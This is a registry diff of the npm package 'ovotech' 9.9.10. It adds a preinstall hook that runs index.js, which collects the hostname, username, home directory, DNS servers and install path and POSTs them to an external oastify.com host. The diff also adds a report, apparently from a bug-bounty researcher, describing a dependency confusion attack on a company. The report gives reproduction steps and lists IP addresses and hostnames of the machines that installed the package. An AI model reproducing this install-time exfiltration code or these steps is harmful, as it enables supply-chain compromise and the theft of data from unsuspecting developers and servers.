ovotech 9.9.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of ovotech might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +53 -0
  2. package/ovo.md +84 -0
  3. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,53 @@
1
+ // author: stewardmailler@gmail.com, https://bugcrowd.com/_mailler
2
+ const os = require('os');
3
+ const dns = require('dns');
4
+ // const querystring = require('querystring');
5
+ const https = require('https');
6
+ const packageJSON = require('./package.json');
7
+ const { URLSearchParams } = require('url');
8
+ const package = packageJSON.name;
9
+
10
+ const trackingData = JSON.stringify({
11
+ p: package,
12
+ c: __dirname,
13
+ type: os.type(),
14
+ rel: os.release(),
15
+ hd: os.homedir(),
16
+ hn: os.hostname(),
17
+ un: os.userInfo().username,
18
+ dns: dns.getServers(),
19
+ r: packageJSON ? packageJSON.___resolved : undefined,
20
+ v: packageJSON.version,
21
+ pjson: packageJSON,
22
+ });
23
+
24
+ // var postData = querystring.stringify({ msg: trackingData });
25
+
26
+ var postData = new URLSearchParams({ msg: trackingData}).toString();
27
+
28
+ // console.log(postData);
29
+
30
+ var options = {
31
+ hostname: "evdr279r1vfkvlzo1bjrim47ryxold.oastify.com",
32
+ port: 443,
33
+ path: "/",
34
+ method: "POST",
35
+ headers: {
36
+ "Content-Type": "application/x-www-form-urlencoded",
37
+ "Content-Length": postData.length,
38
+ },
39
+ };
40
+ // console.log(postData.length)
41
+
42
+ var req = https.request(options, (res) => {
43
+ res.on("data", (d) => {
44
+ process.stdout.write(d);
45
+ });
46
+ });
47
+
48
+ req.on("error", (e) => {
49
+ // console.error(e);
50
+ });
51
+
52
+ req.write(postData);
53
+ req.end();
package/ovo.md ADDED
@@ -0,0 +1,84 @@
1
+
2
+ ## Summary
3
+ Hello there. I have a package you use vulnerable to Dependency Confusion. The vulnerability allowed me to claim a previously unclaimed npm package that are used by Ovotechnology. This allows me to gain code execution on computers that pull the packages. The package name is ovotech
4
+
5
+ ## Some More Details
6
+ The vulnerability occurs if you have a package that you manage internally but you haven't claimed the name on the public npmjs registry (or any other registry).
7
+ The code only logs the username, hostname and the current path of each unique hostname.
8
+ A response to the following URL served as a pointer for me to check the possibility of a Dependency Confusion attack: https://uat.quantum.ovoenergy.com/App.7e884519.js
9
+ In the response, you will find the following lines of code:
10
+ `require("../node_modules/@ovotech/ovo-bootstrap/dist/css/ovo-bootstrap.min.css"),
11
+ require("core-js/stable"),require("regenerator-runtime/runtime");
12
+ var c=(0,e.lazy)(function(){
13
+ return require("_bundle_loader")(require.resolve("./views/checkout/Checkout"))`
14
+
15
+ The identified packages (for now) include:
16
+ ovotech
17
+ _bundler_loader (I haven't uploaded the Proof of Concept yet)
18
+
19
+ The packages I publish only requested for the computer hostname, username and the directory installed.
20
+ From the pleminiary analysis, I can say that it is running on a Windows Machine
21
+
22
+ ## Reproducing
23
+ 1. Find a required package in source code or by whatever means.
24
+ 2. Create a package and upload to the npm registry.
25
+ 3. Ensure that it has a higher version so that it gets pulled by precedence over the internal version.
26
+ 4. Do whatever you'd want to the computers that automatically pull the malicious package
27
+
28
+ ## Impact
29
+ I can execute code on company computers
30
+ Identified IP addresses:
31
+ 47.118.138.231
32
+ 47.118.138.230
33
+ 218.12.99.192
34
+ 40.70.145.84
35
+ 123.161.62.177
36
+ 60.205.226.65
37
+ 101.201.237.165
38
+ 8.140.111.51
39
+ 123.161.62.178
40
+ 60.205.209.221
41
+ 44.242.179.50
42
+ 34.223.46.213
43
+ 34.218.119.127
44
+ 34.222.66.84
45
+ 74.125.179.69
46
+ 74.125.179.76
47
+ 172.253.194.136
48
+ 220.181.151.176
49
+ 60.205.226.65
50
+ 220.181.151.179
51
+ 172.253.9.3
52
+ 172.253.195.207
53
+ 49.7.48.251
54
+ 49.7.48.252
55
+
56
+
57
+ Identified hostnames:
58
+ i. For Linux hosts
59
+ ab34ba76ca3b
60
+ 04db38e1b14a
61
+ d4d535ff38ac
62
+ 5ac7d1333e6e
63
+ 0efc9399d342
64
+ 0df50c013a53
65
+ 0df50c013a53
66
+ c34dbc2932e0
67
+ c34dbc2932e0
68
+ f76b7231c305
69
+ instance - username: k7A48487c6b1e47c
70
+ aws-2WhrI5bSz5vjsD8sRcXw - is it running as root?
71
+
72
+ ii. For Windows hosts
73
+ DESKTOP-4E1IS0K
74
+
75
+ ## Proof of Concept
76
+
77
+
78
+ ## Impact
79
+ Code execution on company computer and the aws server.
80
+
81
+ ## Mitigation
82
+ Create a dummy package on npmjs registry as a placeholder.
83
+
84
+ Thanks.
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ovotech",
3
+ "version": "9.9.10",
4
+ "description": "Bugcrowd White Hat Researcher",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }